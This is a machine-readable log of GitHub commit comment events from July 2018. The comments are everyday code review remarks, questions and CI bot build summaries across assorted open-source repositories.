{"id":"7948090087","type":"CommitCommentEvent","actor":{"login":"seagle0128"},"repo":{"name":"seagle0128/doom-modeline"},"payload":{"comment":{"id":29666732,"position":5,"line":1022,"path":"doom-modeline.el","commit_id":"501a930d32f236f08da6b787a69e2ff904c9c22f","created_at":"2018-07-11T06:47:00Z","updated_at":"2018-07-11T06:47:00Z","author_association":"OWNER","body":"Fix in fefc9d9cfbddba9b0e5f99d5e1db8f79895e7914."}},"created_at":"2018-07-11T06:47:00Z"}
{"id":"7948091514","type":"CommitCommentEvent","actor":{"login":"szepeviktor"},"repo":{"name":"phpstan/phpstan"},"payload":{"comment":{"id":29666733,"position":null,"line":null,"path":null,"commit_id":"ea30584b2aa2b605e01dbca1cc30f3fb136b990a","created_at":"2018-07-11T06:47:24Z","updated_at":"2018-07-11T06:47:24Z","author_association":"CONTRIBUTOR","body":"You might be a PHP expert, I am not.\r\n\r\nI believe the Travis people: https://github.com/travis-ci/travis-ci/issues/4579#issuecomment-127972205"}},"created_at":"2018-07-11T06:47:24Z"}
{"id":"7948092600","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29666735,"position":null,"line":null,"path":null,"commit_id":"a0dd74e16e05b99ca277d9ee7c55b16085696850","created_at":"2018-07-11T06:47:41Z","updated_at":"2018-07-11T06:47:41Z","author_association":"COLLABORATOR","body":"Puzzle `1121-f96bc81e` disappeared from [`src/main/java/com/zerocracy/tk/TkTeam.java`](https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/tk/TkTeam.java), that's why I closed #1123. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-11T06:47:41Z"}
{"id":"7948095225","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29666743,"position":52,"line":52,"path":"bears/vcs/git/CISkipInspectBear.py","commit_id":"f21bdeefe5e236ea9d04c1ade13ea5d28c057bc6","created_at":"2018-07-11T06:48:22Z","updated_at":"2018-07-11T06:48:22Z","author_association":"NONE","body":"This part of code won't be reached since if the commit doesn't match this regex, it also means that the commit doesn't have a `COMMIT_TYPE.ci_skip_commit`, see line 37"}},"created_at":"2018-07-11T06:48:22Z"}
{"id":"7948096062","type":"CommitCommentEvent","actor":{"login":"yesmeck"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29666748,"position":null,"line":null,"path":null,"commit_id":"e3ef74c3e79ec75688ddf323afdc3095a8420910","created_at":"2018-07-11T06:48:34Z","updated_at":"2018-07-11T06:48:34Z","author_association":"MEMBER","body":"https://unpkg.com/moment@2.22.2/src/locale/zh-cn.js"}},"created_at":"2018-07-11T06:48:34Z"}
{"id":"7948097936","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29666751,"position":null,"line":null,"path":null,"commit_id":"8bf8dbe9c3e2b13dc4c9ee5a07612d672b5c8fc7","created_at":"2018-07-11T06:49:05Z","updated_at":"2018-07-11T06:49:05Z","author_association":"NONE","body":"issue_6802 (mbadams5) - Win64-Windows-7-VisualStudio-14: OK (2933 of 2933 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bf8dbe9c3e2b13dc4c9ee5a07612d672b5c8fc7-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bf8dbe9c3e2b13dc4c9ee5a07612d672b5c8fc7-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-11T06:49:05Z"}
{"id":"7948097971","type":"CommitCommentEvent","actor":{"login":"ananya2018"},"repo":{"name":"pathak22/context-encoder"},"payload":{"comment":{"id":29666752,"position":null,"line":null,"path":null,"commit_id":"7332006c75a1405585c329a4614db7f6d9cbe4a0","created_at":"2018-07-11T06:49:06Z","updated_at":"2018-07-11T06:49:06Z","author_association":"NONE","body":"Hello Pathak,\r\nI need the Paris Street view dataset.  \r\nPlease let me know your email id so that I can contact you further on this."}},"created_at":"2018-07-11T06:49:06Z"}
{"id":"7948098017","type":"CommitCommentEvent","actor":{"login":"AShalysh"},"repo":{"name":"AShalysh/ruby_tasks"},"payload":{"comment":{"id":29666753,"position":12,"line":5,"path":"lesson7/cargo_carriage.rb","commit_id":"a10f6098dc87322a19ed1f6a2e8a78fb421980c6","created_at":"2018-07-11T06:49:07Z","updated_at":"2018-07-11T06:49:07Z","author_association":"OWNER","body":"Я внесла изменения по наследованию в проект и залила в гитхаб."}},"created_at":"2018-07-11T06:49:07Z"}
{"id":"7948099061","type":"CommitCommentEvent","actor":{"login":"akakanslzk2"},"repo":{"name":"Runtym/ict_report"},"payload":{"comment":{"id":29666756,"position":null,"line":null,"path":null,"commit_id":"44637e84b09353d31b8b6f24f345f2561e1b8a42","created_at":"2018-07-11T06:49:25Z","updated_at":"2018-07-11T06:49:25Z","author_association":"COLLABORATOR","body":"i cant stop running away"}},"created_at":"2018-07-11T06:49:25Z"}
{"id":"7948100487","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29666758,"position":43,"line":43,"path":"bears/vcs/git/CISkipInspectBear.py","commit_id":"f21bdeefe5e236ea9d04c1ade13ea5d28c057bc6","created_at":"2018-07-11T06:49:49Z","updated_at":"2018-07-11T06:49:49Z","author_association":"NONE","body":"I think this check has been done by `VCSCommitBear`, we can either delete this check from this code, or delete the check in `VCSCommitBear`"}},"created_at":"2018-07-11T06:49:49Z"}
{"id":"7948102716","type":"CommitCommentEvent","actor":{"login":"Swapnil-ingle"},"repo":{"name":"krishna-waidande/ImportParticipantCsv_plugin"},"payload":{"comment":{"id":29666760,"position":110,"line":104,"path":"src/main/java/com/krishagni/importcsv/core/ParticipantCsvImporter.java","commit_id":"1f4e4a0208a331d19aef0ce101548cac2c6e7152","created_at":"2018-07-11T06:50:25Z","updated_at":"2018-07-11T06:50:25Z","author_association":"NONE","body":"We're getting csvHeaderRow() header --> csvHeaderRow"}},"created_at":"2018-07-11T06:50:25Z"}
{"id":"7948102866","type":"CommitCommentEvent","actor":{"login":"kinoafisharu"},"repo":{"name":"zaytseveugene/orpro"},"payload":{"comment":{"id":29666761,"position":null,"line":null,"path":null,"commit_id":"3120ee484c39fe1747fccd63187f1a31c69439d7","created_at":"2018-07-11T06:50:27Z","updated_at":"2018-07-11T06:50:27Z","author_association":"NONE","body":"ОК. Общее пожелание: комменты с назначением изменений и указанием на автора."}},"created_at":"2018-07-11T06:50:27Z"}
{"id":"7948104917","type":"CommitCommentEvent","actor":{"login":"mitchins"},"repo":{"name":"mitchins/micropython"},"payload":{"comment":{"id":29666763,"position":124,"line":360,"path":"ports/esp32/modnetwork.c","commit_id":"dd5ccce0f6856d3136a936e09b34e216d1a15ea3","created_at":"2018-07-11T06:50:59Z","updated_at":"2018-07-11T06:50:59Z","author_association":"OWNER","body":"I agree with that, since the ESP-IDF errors are uint8_t. Just to check is small_int a 16bit short? (MP_OBJ_NEW_SMALL_INT)"}},"created_at":"2018-07-11T06:50:59Z"}
{"id":"7948105863","type":"CommitCommentEvent","actor":{"login":"ivmai"},"repo":{"name":"Unity-Technologies/bdwgc"},"payload":{"comment":{"id":29666767,"position":null,"line":null,"path":null,"commit_id":"a8ddb045cfe203516362319715f333f97ede470d","created_at":"2018-07-11T06:51:15Z","updated_at":"2018-07-11T06:51:15Z","author_association":"NONE","body":"Is libatomic_ops still needed for your targets? What error do you get w/o the module?"}},"created_at":"2018-07-11T06:51:15Z"}
{"id":"7948108592","type":"CommitCommentEvent","actor":{"login":"Swapnil-ingle"},"repo":{"name":"krishna-waidande/ImportParticipantCsv_plugin"},"payload":{"comment":{"id":29666771,"position":111,"line":105,"path":"src/main/java/com/krishagni/importcsv/core/ParticipantCsvImporter.java","commit_id":"1f4e4a0208a331d19aef0ce101548cac2c6e7152","created_at":"2018-07-11T06:52:01Z","updated_at":"2018-07-11T06:52:01Z","author_association":"NONE","body":"This is the list of expected headers: headers --> expectedHeader."}},"created_at":"2018-07-11T06:52:01Z"}
{"id":"7948110065","type":"CommitCommentEvent","actor":{"login":"juliushaertl"},"repo":{"name":"nextcloud/deck"},"payload":{"comment":{"id":29666775,"position":9,"line":61,"path":"lib/Controller/PageController.php","commit_id":"a36dfcc14448422da75a5fc8048f74593e4893df","created_at":"2018-07-11T06:52:24Z","updated_at":"2018-07-11T06:52:24Z","author_association":"MEMBER","body":"$AppName is undefined, I guess that is the reason that the config value is not persisted properly."}},"created_at":"2018-07-11T06:52:24Z"}
{"id":"7948111657","type":"CommitCommentEvent","actor":{"login":"ksrr0215"},"repo":{"name":"ksrr0215/branch"},"payload":{"comment":{"id":29666777,"position":null,"line":null,"path":null,"commit_id":"56dc6374a6a2fc7f41e8ae534b6aefc64907f0ec","created_at":"2018-07-11T06:52:50Z","updated_at":"2018-07-11T06:52:50Z","author_association":"OWNER","body":"2018 results"}},"created_at":"2018-07-11T06:52:50Z"}
{"id":"7948111779","type":"CommitCommentEvent","actor":{"login":"ivmai"},"repo":{"name":"Unity-Technologies/bdwgc"},"payload":{"comment":{"id":29666778,"position":15,"line":408,"path":"allchblk.c","commit_id":"b6af81bd96fd1ef8a29f9efec3ca39a03d37db91","created_at":"2018-07-11T06:52:52Z","updated_at":"2018-07-11T06:52:52Z","author_association":"NONE","body":"UNMAP_THRESHOLD is already defined to (2 or 6) in gcconfig.h"}},"created_at":"2018-07-11T06:52:52Z"}
{"id":"7948112681","type":"CommitCommentEvent","actor":{"login":"sanya5549"},"repo":{"name":"sanya5549/git-test"},"payload":{"comment":{"id":29666780,"position":null,"line":null,"path":null,"commit_id":"55b6e1900438450e2bdecfe9ef45646f2b2d4635","created_at":"2018-07-11T06:53:07Z","updated_at":"2018-07-11T06:53:07Z","author_association":"OWNER","body":"\r\n[package-lock.zip](https://github.com/sanya5549/git-test/files/2183241/package-lock.zip)\r\n"}},"created_at":"2018-07-11T06:53:07Z"}
{"id":"7948114118","type":"CommitCommentEvent","actor":{"login":"sanya5549"},"repo":{"name":"sanya5549/git-test"},"payload":{"comment":{"id":29666781,"position":null,"line":null,"path":null,"commit_id":"55b6e1900438450e2bdecfe9ef45646f2b2d4635","created_at":"2018-07-11T06:53:30Z","updated_at":"2018-07-11T06:53:30Z","author_association":"OWNER","body":"first commit"}},"created_at":"2018-07-11T06:53:30Z"}
{"id":"7948115592","type":"CommitCommentEvent","actor":{"login":"juliushaertl"},"repo":{"name":"nextcloud/deck"},"payload":{"comment":{"id":29666784,"position":37,"line":54,"path":"lib/Service/DefaultBoardService.php","commit_id":"a36dfcc14448422da75a5fc8048f74593e4893df","created_at":"2018-07-11T06:53:51Z","updated_at":"2018-07-11T06:53:51Z","author_association":"MEMBER","body":"There should probably also a check if the user doesn't have any boards. If there are some boards already the user already used deck. That would still create the default board for users after the app gets updated."}},"created_at":"2018-07-11T06:53:51Z"}
{"id":"7948115770","type":"CommitCommentEvent","actor":{"login":"yesmeck"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29666786,"position":null,"line":null,"path":null,"commit_id":"e3ef74c3e79ec75688ddf323afdc3095a8420910","created_at":"2018-07-11T06:53:54Z","updated_at":"2018-07-11T06:53:54Z","author_association":"MEMBER","body":"> // import 'moment/locale/zh-cn'; if you are using webpack 1\r\n"}},"created_at":"2018-07-11T06:53:54Z"}
{"id":"7948116911","type":"CommitCommentEvent","actor":{"login":"sanya5549"},"repo":{"name":"sanya5549/git-test"},"payload":{"comment":{"id":29666787,"position":null,"line":null,"path":null,"commit_id":"55b6e1900438450e2bdecfe9ef45646f2b2d4635","created_at":"2018-07-11T06:54:12Z","updated_at":"2018-07-11T06:54:12Z","author_association":"OWNER","body":"first commit"}},"created_at":"2018-07-11T06:54:12Z"}
{"id":"7948118841","type":"CommitCommentEvent","actor":{"login":"MattMattV"},"repo":{"name":"MattMattV/after-dark"},"payload":{"comment":{"id":29666789,"position":null,"line":null,"path":null,"commit_id":"19fa17bdb044830f31bfb7e0be2a025a37899d26","created_at":"2018-07-11T06:54:42Z","updated_at":"2018-07-11T06:54:42Z","author_association":"OWNER","body":"I found the why of the stats not displaying, I mainly use Firefox Nightly on my workstation, and when I tried with Google Chrome, page view appeared !\r\n\r\nI set up fathom (built from source) + some dummy server with dummy HTML + fathom tracking code and it worked flawlessly, I don't know why fathom does not work on my Firefox I tried with all my module disabled but there is nothing to do.. The tracker code is retrievd but nothing is sent back to the Fathom server, I will try to open an issue in their repo to understand what is happening (: \r\n\r\nI think the race is over ! :D"}},"created_at":"2018-07-11T06:54:42Z"}
{"id":"7948119004","type":"CommitCommentEvent","actor":{"login":"TheLimeGlass"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29666791,"position":null,"line":null,"path":null,"commit_id":"cba65526a60debfd9ad1c1a34b55c022b6bca37a","created_at":"2018-07-11T06:54:45Z","updated_at":"2018-07-11T06:54:45Z","author_association":"CONTRIBUTOR","body":"```\r\nSkript.registerEffect(EffMakeFly.class, \"force %players% to [(start|1¦stop)] fly[ing]\",\r\n+\t\t\t\t\t\t\t\t\t\t\t\t\"make %players% (start|1¦stop) flying\",\r\n+\t\t\t\t\t\t\t\t\t\t\t\t\"make %players% fly\");\r\n```\r\n```\r\nSkript.registerEffect(EffMakeFly.class, \"force %players% to [(start|1¦stop)] fly[ing]\",\r\n\t\t\t\t\t\t\t\t\"make %players% (start|1¦stop) flying\",\r\n\t\t\t\t\t\t\t\t\"make %players% fly\");\r\n```\r\nLine these up, and I don't get why the fly[ing] optional isn't in the other second syntax, the first and second in my opinion should be merged."}},"created_at":"2018-07-11T06:54:45Z"}
{"id":"7948119900","type":"CommitCommentEvent","actor":{"login":"ralcaide"},"repo":{"name":"Sinapse-Energia/AP-Sinapse"},"payload":{"comment":{"id":29666793,"position":null,"line":null,"path":null,"commit_id":"1df3bd41394c518700cbcb57900ca8bf1932c435","created_at":"2018-07-11T06:54:59Z","updated_at":"2018-07-11T06:54:59Z","author_association":"CONTRIBUTOR","body":"After this commit could we already test the RTC behaviour or should we wait for something else?"}},"created_at":"2018-07-11T06:54:59Z"}
{"id":"7948120511","type":"CommitCommentEvent","actor":{"login":"kaysonli"},"repo":{"name":"vuejs/vue-cli"},"payload":{"comment":{"id":29666795,"position":null,"line":null,"path":null,"commit_id":"a9aa3decf6b36a968cb66fc6dc48b1756d1f7a8f","created_at":"2018-07-11T06:55:08Z","updated_at":"2018-07-11T06:55:08Z","author_association":"NONE","body":"These changes do not appear to have been published to npm yet?"}},"created_at":"2018-07-11T06:55:08Z"}
{"id":"7948122071","type":"CommitCommentEvent","actor":{"login":"Rkkpb"},"repo":{"name":"Rkkpb/PolicyBolOriginal"},"payload":{"comment":{"id":29666798,"position":null,"line":null,"path":null,"commit_id":"7b543f03553baf04d6451e9b62f36ecd84a830f9","created_at":"2018-07-11T06:55:32Z","updated_at":"2018-07-11T06:55:32Z","author_association":"OWNER","body":"Success"}},"created_at":"2018-07-11T06:55:32Z"}
{"id":"7948125496","type":"CommitCommentEvent","actor":{"login":"ivmai"},"repo":{"name":"Unity-Technologies/bdwgc"},"payload":{"comment":{"id":29666801,"position":32,"line":422,"path":"allchblk.c","commit_id":"b6af81bd96fd1ef8a29f9efec3ca39a03d37db91","created_at":"2018-07-11T06:56:27Z","updated_at":"2018-07-11T06:56:27Z","author_association":"NONE","body":"What does this change? Does the wraparound problem still exist?"}},"created_at":"2018-07-11T06:56:27Z"}
{"id":"7948125877","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29666802,"position":null,"line":null,"path":null,"commit_id":"b8163aa823feb21ab3f3d5e46330cd3d569fd75c","created_at":"2018-07-11T06:56:33Z","updated_at":"2018-07-11T06:56:33Z","author_association":"NONE","body":"expanded-runperiod (jasondegraw) - x86_64-MacOS-10.9-clang: OK (2917 of 2926 tests passed, 13 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 13 tests had: EIO diffs.\n * 4 tests had: ESO small diffs.\n * 4 tests had: Table small diffs.\n * 1 test had: BND diffs.\n * 9 tests had: ESO big diffs.\n * 7 tests had: Table big diffs.\n * 2 tests had: MTD diffs.\n * 4 tests had: MTR big diffs.\n * 2 tests had: MTR small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 614\n * Failed: 9\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8163aa823feb21ab3f3d5e46330cd3d569fd75c-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8163aa823feb21ab3f3d5e46330cd3d569fd75c-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.69%25-yellow.png)</a> \n"}},"created_at":"2018-07-11T06:56:33Z"}
{"id":"7948126785","type":"CommitCommentEvent","actor":{"login":"juliushaertl"},"repo":{"name":"nextcloud/deck"},"payload":{"comment":{"id":29666805,"position":37,"line":54,"path":"lib/Service/DefaultBoardService.php","commit_id":"a36dfcc14448422da75a5fc8048f74593e4893df","created_at":"2018-07-11T06:56:47Z","updated_at":"2018-07-11T06:56:47Z","author_association":"MEMBER","body":"Please use strict comparison (`===` instead of `==`)"}},"created_at":"2018-07-11T06:56:47Z"}
{"id":"7948129057","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"luserx0/src"},"payload":{"comment":{"id":29666810,"position":5,"line":265,"path":"sys/dev/acpi/acpica/OsdHardware.c","commit_id":"cd99d022f8a58e6e308d3aaba6911bd1f28fdaec","created_at":"2018-07-11T06:57:22Z","updated_at":"2018-07-11T06:57:22Z","author_association":"COLLABORATOR","body":"I don't like it. tmp is uint32_t, not uint64_t. Also I would use C decoration without cast.\r\n\r\nAlso the 'cast 16' part isn't fixed."}},"created_at":"2018-07-11T06:57:22Z"}
{"id":"7948131198","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"kevinbird61/nstack"},"payload":{"comment":{"id":29666813,"position":null,"line":null,"path":null,"commit_id":"4c1e1aeaf7ada2f0da6b9d95e272a94d7119f7a2","created_at":"2018-07-11T06:57:52Z","updated_at":"2018-07-11T06:57:52Z","author_association":"NONE","body":"Look forward to your work!"}},"created_at":"2018-07-11T06:57:52Z"}
{"id":"7948131636","type":"CommitCommentEvent","actor":{"login":"vinesmsuic"},"repo":{"name":"vinesmsuic/ChenTheDiscordBot"},"payload":{"comment":{"id":29666814,"position":null,"line":null,"path":null,"commit_id":"699bf2cbaac7ec6383f7aee94bc862ff1c1a5ff4","created_at":"2018-07-11T06:57:58Z","updated_at":"2018-07-11T06:57:58Z","author_association":"OWNER","body":"prefix"}},"created_at":"2018-07-11T06:57:58Z"}
{"id":"7948136656","type":"CommitCommentEvent","actor":{"login":"juliushaertl"},"repo":{"name":"nextcloud/deck"},"payload":{"comment":{"id":29666823,"position":29,"line":64,"path":"lib/Controller/PageController.php","commit_id":"683354da9d89a5275aa18a32ca3845e793ef1b29","created_at":"2018-07-11T06:59:12Z","updated_at":"2018-07-11T06:59:12Z","author_association":"MEMBER","body":"Please inject \\OCP\\IL10N in the constructor and make the 'Personal' string translatable with $this->l10n->t();"}},"created_at":"2018-07-11T06:59:12Z"}
{"id":"7948138529","type":"CommitCommentEvent","actor":{"login":"jammmet"},"repo":{"name":"openwrt/packages"},"payload":{"comment":{"id":29666833,"position":null,"line":null,"path":null,"commit_id":"f6e06384f1c5aca396ec65a70ec94837f1c133a8","created_at":"2018-07-11T06:59:40Z","updated_at":"2018-07-11T06:59:40Z","author_association":"NONE","body":"How would I check and fix this?"}},"created_at":"2018-07-11T06:59:40Z"}
{"id":"7948139676","type":"CommitCommentEvent","actor":{"login":"fpgamcu"},"repo":{"name":"Sinapse-Energia/AP-Sinapse"},"payload":{"comment":{"id":29666837,"position":null,"line":null,"path":null,"commit_id":"1df3bd41394c518700cbcb57900ca8bf1932c435","created_at":"2018-07-11T06:59:58Z","updated_at":"2018-07-11T06:59:58Z","author_association":"NONE","body":"Yes, you can test, but before please check is battery is not discharged. And better would be to remove RES_MI_19_2."}},"created_at":"2018-07-11T06:59:58Z"}
{"id":"7948140356","type":"CommitCommentEvent","actor":{"login":"ivmai"},"repo":{"name":"Unity-Technologies/bdwgc"},"payload":{"comment":{"id":29666840,"position":4,"line":17,"path":"misc.c","commit_id":"b6af81bd96fd1ef8a29f9efec3ca39a03d37db91","created_at":"2018-07-11T07:00:08Z","updated_at":"2018-07-11T07:00:08Z","author_association":"NONE","body":"Not needed here (gc_priv.h is included from gc_pmark.h)"}},"created_at":"2018-07-11T07:00:08Z"}
{"id":"7948141799","type":"CommitCommentEvent","actor":{"login":"rekovic"},"repo":{"name":"cerminar/cmssw"},"payload":{"comment":{"id":29666849,"position":null,"line":null,"path":null,"commit_id":"7a9e16c035e66a43a32980031ef8165542164940","created_at":"2018-07-11T07:00:28Z","updated_at":"2018-07-11T07:00:28Z","author_association":"NONE","body":"@cerminar When testing PFCal-dev tag v2.7_1017 on top of 10_1_7 with L1T and try to write output file, there is an error.  \r\n\r\n----- Begin Fatal Exception 11-Jul-2018 08:01:06 CEST-----------------------\r\nAn exception of category 'FileReadError' occurred while\r\n   [0] Rethrowing an exception that happened on a different thread.\r\n   [1] Reading branch l1tHGCalTowerBXVector_hgcalTriggerPrimitiveDigiProducer_tower_HLT.\r\n   Additional Info:\r\n      [a] Fatal Root Error: @SUB=TStreamerInfo::Build\r\nl1t::HGCalTower: l1t::HGCalTowerID has no streamer or dictionary, data member \"id_\" will not be saved\r\n\r\n----- End Fatal Exception -------------------------------------------------\r\n\r\nP.S. \r\nJean-Baptiste just wrote.  There was a fix, but not back-ported.  He will provide a new tag."}},"created_at":"2018-07-11T07:00:28Z"}
{"id":"7948143223","type":"CommitCommentEvent","actor":{"login":"tbalden"},"repo":{"name":"joshuous/android_kernel_oneplus_msm8998"},"payload":{"comment":{"id":29666855,"position":null,"line":null,"path":null,"commit_id":"552775c39ca5640d741b944c90be47001c7c6410","created_at":"2018-07-11T07:00:48Z","updated_at":"2018-07-11T07:00:48Z","author_association":"NONE","body":"Gotta check this in detail. I like the idea"}},"created_at":"2018-07-11T07:00:48Z"}
{"id":"7948144575","type":"CommitCommentEvent","actor":{"login":"juliushaertl"},"repo":{"name":"nextcloud/deck"},"payload":{"comment":{"id":29666860,"position":9,"line":61,"path":"lib/Controller/PageController.php","commit_id":"a36dfcc14448422da75a5fc8048f74593e4893df","created_at":"2018-07-11T07:01:09Z","updated_at":"2018-07-11T07:01:09Z","author_association":"MEMBER","body":"Should be $this->appName"}},"created_at":"2018-07-11T07:01:09Z"}
{"id":"7948148168","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29666871,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-11T07:02:01Z","updated_at":"2018-07-11T07:02:01Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T07:02:01Z"}
{"id":"7948150234","type":"CommitCommentEvent","actor":{"login":"eliswo"},"repo":{"name":"eliswo/feckless-spork"},"payload":{"comment":{"id":29666873,"position":null,"line":null,"path":null,"commit_id":"d794617a41a88e54291080e593aa72c743dc1adf","created_at":"2018-07-11T07:02:31Z","updated_at":"2018-07-11T07:02:31Z","author_association":"OWNER","body":"eliswo@gmail.com"}},"created_at":"2018-07-11T07:02:31Z"}
{"id":"7948152882","type":"CommitCommentEvent","actor":{"login":"pradyunsg"},"repo":{"name":"iwanb/pip"},"payload":{"comment":{"id":29666878,"position":15,"line":133,"path":"src/pip/_internal/req/req_file.py","commit_id":"6ead47f2f155cff335f2b5b36034519957c95b23","created_at":"2018-07-11T07:03:10Z","updated_at":"2018-07-11T07:03:10Z","author_association":"NONE","body":"I don't think you need a copy -- you'd want to add that requirement to the `no_binary` of format_control."}},"created_at":"2018-07-11T07:03:10Z"}
{"id":"7948154338","type":"CommitCommentEvent","actor":{"login":"ivmai"},"repo":{"name":"Unity-Technologies/bdwgc"},"payload":{"comment":{"id":29666883,"position":5,"line":1219,"path":"win32_threads.c","commit_id":"b6af81bd96fd1ef8a29f9efec3ca39a03d37db91","created_at":"2018-07-11T07:03:31Z","updated_at":"2018-07-11T07:03:31Z","author_association":"NONE","body":"Not needed (already declared in gc_priv.h)"}},"created_at":"2018-07-11T07:03:31Z"}
{"id":"7948156732","type":"CommitCommentEvent","actor":{"login":"curioswitch-role"},"repo":{"name":"curioswitch/curiostack"},"payload":{"comment":{"id":29666890,"position":null,"line":null,"path":null,"commit_id":"73d82709350d0af40a0f02eefc1a9a8dc82c7889","created_at":"2018-07-11T07:04:07Z","updated_at":"2018-07-11T07:04:07Z","author_association":"NONE","body":"Build failed. Check the logs and try again.\n\nLogs:\nhttps://console.cloud.google.com/gcr/builds/b862f1b0-beac-4805-971b-6d8975a98697?project=153942441948"}},"created_at":"2018-07-11T07:04:07Z"}
{"id":"7948157100","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29666893,"position":null,"line":null,"path":null,"commit_id":"a8f7a9f8b8d6d9406ac7958fe25a5c5751a874ec","created_at":"2018-07-11T07:04:12Z","updated_at":"2018-07-11T07:04:12Z","author_association":"NONE","body":"issue_6729 (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2971 of 2972 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 642\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8f7a9f8b8d6d9406ac7958fe25a5c5751a874ec-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8f7a9f8b8d6d9406ac7958fe25a5c5751a874ec-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-11T07:04:12Z"}
{"id":"7948157226","type":"CommitCommentEvent","actor":{"login":"Rkkpb"},"repo":{"name":"Rkkpb/PolicyBolOriginal"},"payload":{"comment":{"id":29666894,"position":null,"line":null,"path":null,"commit_id":"7b543f03553baf04d6451e9b62f36ecd84a830f9","created_at":"2018-07-11T07:04:14Z","updated_at":"2018-07-11T07:04:14Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-11T07:04:14Z"}
{"id":"7948163623","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29666906,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-11T07:05:52Z","updated_at":"2018-07-11T07:05:52Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T07:05:52Z"}
